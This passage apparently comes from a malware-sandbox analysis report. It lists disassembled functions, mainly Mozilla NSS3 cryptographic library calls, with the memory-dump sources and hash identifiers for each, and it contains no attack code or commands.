                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 6CFCDD0E
                                                                                • PK11_IsFriendly.NSS3(?), ref: 6CFCDD73
                                                                                • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CFCDD8B
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFCDE81
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFCDEA6
                                                                                • PR_Unlock.NSS3(?), ref: 6CFCDF08
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 519503562-0
                                                                                • Opcode ID: 4298df7e990f51bf39dc1f784b6772988d74678c794d8ef25c9047ca7eefd82f
                                                                                • Instruction ID: 8b1df64d494006ec1c2a441e5e0b46e0e31c612f99a755e899903e1ce5b72f47
                                                                                • Opcode Fuzzy Hash: 4298df7e990f51bf39dc1f784b6772988d74678c794d8ef25c9047ca7eefd82f
                                                                                • Instruction Fuzzy Hash: 2A9180B5B402069FEB00CF68D881BAFB7B5BF54308F258029D9199B741E731E955CB93
                                                                                Function 6CFDBCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CERT_NewCertList.NSS3 ref: 6CFDBD1E
                                                                                  • Part of subcall function 6CFB2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CFB2F0A
                                                                                  • Part of subcall function 6CFB2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFB2F1D
                                                                                  • Part of subcall function 6CFF57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CFBB41E,00000000,00000000,?,00000000,?,6CFBB41E,00000000,00000000,00000001,?), ref: 6CFF57E0
                                                                                  • Part of subcall function 6CFF57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CFF5843
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFDBD8C
                                                                                  • Part of subcall function 6D00FAB0: free.MOZGLUE(?,-00000001,?,?,6CFAF673,00000000,00000000), ref: 6D00FAC7
                                                                                • CERT_DestroyCertList.NSS3(00000000), ref: 6CFDBD9B
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CFDBDA9
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFDBE3A
                                                                                  • Part of subcall function 6CFB3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFB3EC2
                                                                                  • Part of subcall function 6CFB3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CFB3ED6
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CFB3EEE
                                                                                  • Part of subcall function 6CFB3E60: PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFB3F02
                                                                                  • Part of subcall function 6CFB3E60: PL_FreeArenaPool.NSS3 ref: 6CFB3F14
                                                                                  • Part of subcall function 6CFB3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFB3F27
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFDBE52
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CFB2CDA,?,00000000), ref: 6CFB2E1E
                                                                                  • Part of subcall function 6CFB2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CFB2E33
                                                                                  • Part of subcall function 6CFB2E00: TlsGetValue.KERNEL32 ref: 6CFB2E4E
                                                                                  • Part of subcall function 6CFB2E00: EnterCriticalSection.KERNEL32(?), ref: 6CFB2E5E
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableLookup.NSS3(?), ref: 6CFB2E71
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableRemove.NSS3(?), ref: 6CFB2E84
                                                                                  • Part of subcall function 6CFB2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CFB2E96
                                                                                  • Part of subcall function 6CFB2E00: PR_Unlock.NSS3 ref: 6CFB2EA9
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFDBE61
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 2178860483-0
                                                                                • Opcode ID: 92904d0e5e1fd56b55dbaec5d49e1e2606048146ad474a224a75cad0bcc44802
                                                                                • Instruction ID: 758dc0a27691a88bb8ab93eecdd10a85f23fe3f8ea3ef83f2545d151d92cd929
                                                                                • Opcode Fuzzy Hash: 92904d0e5e1fd56b55dbaec5d49e1e2606048146ad474a224a75cad0bcc44802
                                                                                • Instruction Fuzzy Hash: B041D2B6A04210AFD710DF24DC81BAB77E8EB45718F1A8568F91997712E731E904CB92
                                                                                Function 6CFFAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CFFAB3E,?,?,?), ref: 6CFFAC35
                                                                                  • Part of subcall function 6CFDCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CFDCF16
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CFFAB3E,?,?,?), ref: 6CFFAC55
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CFFAB3E,?,?), ref: 6CFFAC70
                                                                                  • Part of subcall function 6CFDE300: TlsGetValue.KERNEL32 ref: 6CFDE33C
                                                                                  • Part of subcall function 6CFDE300: EnterCriticalSection.KERNEL32(?), ref: 6CFDE350
                                                                                  • Part of subcall function 6CFDE300: PR_Unlock.NSS3(?), ref: 6CFDE5BC
                                                                                  • Part of subcall function 6CFDE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CFDE5CA
                                                                                  • Part of subcall function 6CFDE300: TlsGetValue.KERNEL32 ref: 6CFDE5F2
                                                                                  • Part of subcall function 6CFDE300: EnterCriticalSection.KERNEL32(?), ref: 6CFDE606
                                                                                  • Part of subcall function 6CFDE300: PORT_Alloc_Util.NSS3(?), ref: 6CFDE613
                                                                                • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CFFAC92
                                                                                • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFFAB3E), ref: 6CFFACD7
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6CFFAD10
                                                                                • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CFFAD2B
                                                                                  • Part of subcall function 6CFDF360: TlsGetValue.KERNEL32(00000000,?,6CFFA904,?), ref: 6CFDF38B
                                                                                  • Part of subcall function 6CFDF360: EnterCriticalSection.KERNEL32(?,?,?,6CFFA904,?), ref: 6CFDF3A0
                                                                                  • Part of subcall function 6CFDF360: PR_Unlock.NSS3(?,?,?,?,6CFFA904,?), ref: 6CFDF3D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                • String ID:
                                                                                • API String ID: 2926855110-0
                                                                                • Opcode ID: a6a26279db7a8a7621b5ad1ec25bc0d0c2b31d89a1d20d2e13b6fc94213dc2ea
                                                                                • Instruction ID: 7acbedad751d1a1c1dc2937126f2815f91e3c4b7df4ebc06de0322fbab910fd1
                                                                                • Opcode Fuzzy Hash: a6a26279db7a8a7621b5ad1ec25bc0d0c2b31d89a1d20d2e13b6fc94213dc2ea
                                                                                • Instruction Fuzzy Hash: D0314CB2E042055FEB00CF65CC50AAF77B6EF84318B198128E8349B750FB31ED1287A1
                                                                                Function 6CFD8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_Now.NSS3 ref: 6CFD8C7C
                                                                                  • Part of subcall function 6D079DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DC6
                                                                                  • Part of subcall function 6D079DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DD1
                                                                                  • Part of subcall function 6D079DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D079DED
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CFD8CB0
                                                                                • TlsGetValue.KERNEL32 ref: 6CFD8CD1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFD8CE5
                                                                                • PR_Unlock.NSS3(?), ref: 6CFD8D2E
                                                                                • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CFD8D62
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFD8D93
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                • String ID:
                                                                                • API String ID: 3131193014-0
                                                                                • Opcode ID: e66eaafb43100b29c7c903f80835ea2801ca4e3b12963d0e72d45a63282e7ac2
                                                                                • Instruction ID: 3e60a46a57e777014f36b0eedb4ae068d6affcc806601eb4b0ef543afa53ca5c
                                                                                • Opcode Fuzzy Hash: e66eaafb43100b29c7c903f80835ea2801ca4e3b12963d0e72d45a63282e7ac2
                                                                                • Instruction Fuzzy Hash: 57314871901201AFE700AF64EC4079AB774FF55318F1A013AEE1567790D770B964CBD1
                                                                                Function 6D019D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6D019C5B), ref: 6D019D82
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6D019C5B), ref: 6D019DA9
                                                                                  • Part of subcall function 6D011340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D01136A
                                                                                  • Part of subcall function 6D011340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D01137E
                                                                                  • Part of subcall function 6D011340: PL_ArenaGrow.NSS3(?,6CFAF599,?,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?), ref: 6D0113CF
                                                                                  • Part of subcall function 6D011340: PR_Unlock.NSS3(?,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D01145C
                                                                                • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6D019C5B), ref: 6D019DCE
                                                                                  • Part of subcall function 6D011340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000,?,6CFAF599,?,00000000), ref: 6D0113F0
                                                                                  • Part of subcall function 6D011340: PL_ArenaGrow.NSS3(?,6CFAF599,?,?,?,00000000,00000000,?,6CFB895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6D011445
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,6D019C5B), ref: 6D019DDC
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6D019C5B), ref: 6D019DFE
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6D019C5B), ref: 6D019E43
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6D019C5B), ref: 6D019E91
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                  • Part of subcall function 6D011560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6D00FAAB,00000000), ref: 6D01157E
                                                                                  • Part of subcall function 6D011560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D00FAAB,00000000), ref: 6D011592
                                                                                  • Part of subcall function 6D011560: memset.VCRUNTIME140(?,00000000,?), ref: 6D011600
                                                                                  • Part of subcall function 6D011560: PL_ArenaRelease.NSS3(?,?), ref: 6D011620
                                                                                  • Part of subcall function 6D011560: PR_Unlock.NSS3(?), ref: 6D011639
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                • String ID:
                                                                                • API String ID: 3425318038-0
                                                                                • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                • Instruction ID: f01054d24a0a9d37c63d9e46aba9a15b2f5a3266a84339111a0b6c7a8b248ecc
                                                                                • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                • Instruction Fuzzy Hash: 57418FB4504603AFF704CF54EC40B66BBE1FF45348F458128D9184BAA0EB72E934CB81
                                                                                Function 6CFDDDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CFDDDEC
                                                                                  • Part of subcall function 6D010840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D0108B4
                                                                                • PK11_DigestBegin.NSS3(00000000), ref: 6CFDDE70
                                                                                • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CFDDE83
                                                                                • HASH_ResultLenByOidTag.NSS3(?), ref: 6CFDDE95
                                                                                • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CFDDEAE
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CFDDEBB
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFDDECC
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                • String ID:
                                                                                • API String ID: 1091488953-0
                                                                                • Opcode ID: baeedcc26a280f509493a4f74b7613192ed7669cebac1a0c9f408aaf2c1bb571
                                                                                • Instruction ID: ce056f860c7fc7b54eb3ebb836ff6baa9888c84b988aa8c83cb09914219e7e31
                                                                                • Opcode Fuzzy Hash: baeedcc26a280f509493a4f74b7613192ed7669cebac1a0c9f408aaf2c1bb571
                                                                                • Instruction Fuzzy Hash: 0D31B7B29042156BEB016F68AC41BFB77A8DF54708F0A0125ED09A7741FB31E914CBF2
                                                                                Function 6D00DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6D00D9E4,00000000), ref: 6D00DC30
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6D00D9E4,00000000), ref: 6D00DC4E
                                                                                • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6D00D9E4,00000000), ref: 6D00DC5A
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D00DC7E
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D00DCAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Arenamemcpy
                                                                                • String ID:
                                                                                • API String ID: 2632744278-0
                                                                                • Opcode ID: f434aafb65607b69c828d02c159292d5efde991b5df98801c70a011ac93bda13
                                                                                • Instruction ID: e3361c8398eade80bea3463e24435c07371111bc31217f2543ea1b3cf6d5963c
                                                                                • Opcode Fuzzy Hash: f434aafb65607b69c828d02c159292d5efde991b5df98801c70a011ac93bda13
                                                                                • Instruction Fuzzy Hash: F7314DB5A04202AFF751CF59D884F56B7F8BF95354F148429E948CB601E7B1E940CBB1
                                                                                Function 6CFC8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6CFC8C1B
                                                                                • EnterCriticalSection.KERNEL32 ref: 6CFC8C34
                                                                                • PL_ArenaAllocate.NSS3 ref: 6CFC8C65
                                                                                • PR_Unlock.NSS3 ref: 6CFC8C9C
                                                                                • PR_Unlock.NSS3 ref: 6CFC8CB6
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                • String ID: KRAM
                                                                                • API String ID: 4127063985-3815160215
                                                                                • Opcode ID: 423bc6dc99aca4c5a769fe2f6f4947e16869f691188d6069d28537ea6d592916
                                                                                • Instruction ID: 1c370422a0bbbd7162a2a14aa9ebdd07e57305bf0bd8a22e8009bc06e4456b70
                                                                                • Opcode Fuzzy Hash: 423bc6dc99aca4c5a769fe2f6f4947e16869f691188d6069d28537ea6d592916
                                                                                • Instruction Fuzzy Hash: 8E212CB1B056028FD700EF78C48466ABBF4FF45308F06896AD8888B751EB75D895CB92
                                                                                Function 6D0C2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_EnterMonitor.NSS3 ref: 6D0C2CA0
                                                                                • PR_ExitMonitor.NSS3 ref: 6D0C2CBE
                                                                                • calloc.MOZGLUE(00000001,00000014), ref: 6D0C2CD1
                                                                                • strdup.MOZGLUE(?), ref: 6D0C2CE1
                                                                                • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6D0C2D27
                                                                                Strings
                                                                                • Loaded library %s (static lib), xrefs: 6D0C2D22
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                • String ID: Loaded library %s (static lib)
                                                                                • API String ID: 3511436785-2186981405
                                                                                • Opcode ID: edb480b29fde8e9efd4f75c7dac216df843991eb661a38e38396678816125c3f
                                                                                • Instruction ID: b04d13cbb6c0363d5b8d1eae6cf81f4e5a7a30fd5fed11f2c8f534b2bee842d9
                                                                                • Opcode Fuzzy Hash: edb480b29fde8e9efd4f75c7dac216df843991eb661a38e38396678816125c3f
                                                                                • Instruction Fuzzy Hash: 721108B5600200DFFB208F24EC82B6EB7B5EB56359F04813DD81987741E7B29844CBA2
                                                                                Function 6CFBBDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800), ref: 6CFBBDCA
                                                                                  • Part of subcall function 6D010FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CFB87ED,00000800,6CFAEF74,00000000), ref: 6D011000
                                                                                  • Part of subcall function 6D010FF0: PR_NewLock.NSS3(?,00000800,6CFAEF74,00000000), ref: 6D011016
                                                                                  • Part of subcall function 6D010FF0: PL_InitArenaPool.NSS3(00000000,security,6CFB87ED,00000008,?,00000800,6CFAEF74,00000000), ref: 6D01102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFBBDDB
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
